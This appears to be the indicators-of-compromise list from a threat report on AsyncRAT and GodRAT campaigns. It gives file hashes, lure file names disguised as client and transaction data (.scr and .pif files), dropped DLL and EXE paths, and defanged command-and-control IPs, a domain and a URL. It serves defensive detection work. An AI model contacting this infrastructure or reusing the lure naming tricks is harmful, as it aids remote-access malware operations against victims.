4ecd2cf02bdf19cdbc5507e85a32c657 Async RAT 17e71cd415272a6469386f95366d3b64 Async RAT File paths C:\users\[username]\downloads\2023-2024clientlist&.scr C:\users\[username]\downloads\2024-11-15_23.45.45 .scr C:\Users\[username]\Downloads\2024-08-01_2024-12-31Data.scr C:\Users\[username]\ C:\Users\[username]\Downloads\2024-2025Top&Data.scr C:\Users\[username]\Downloads\2025TopClineData&1.scr C:\Users\[username]\Downloads\Corporate customer transaction &volume.pif C:\telegram desktop\Company self-media account application qualifications&.zip C:\Users\[username]\Downloads\个人信息资料&.pdf.pif %ALLUSERSPROFILE%\bugreport\360Safe2.exe %ALLUSERSPROFILE%\google\chrome.exe %ALLUSERSPROFILE%\google\msedge.exe %LOCALAPPDATA%\valve\valve\SDL2.dll %LOCALAPPDATA%\bugreport\LoggerCollector.dll %ALLUSERSPROFILE%\bugreport\LoggerCollector.dll %LOCALAPPDATA%\bugreport\bugreport_.exe Domains and IPs 103[.]237[.]92[.]191 GodRAT C2 118[.]99[.]3[.]33 GodRAT С2 118[.]107[.]46[.]174 GodRAT C2 154[.]91[.]183[.]174 GodRAT C2 wuwu6[.]cfd AsyncRAT C2 156[.]241[.]134[.]49 AsyncRAT C2 https://holoohg.oss-cn-hongkong.aliyuncs[.]com/HG.txt URL containing AsyncRAT C2 address bytes 47[.]238[.]124[.]68 AsyncRAT C2
securelist.comAug 19, 2025extracted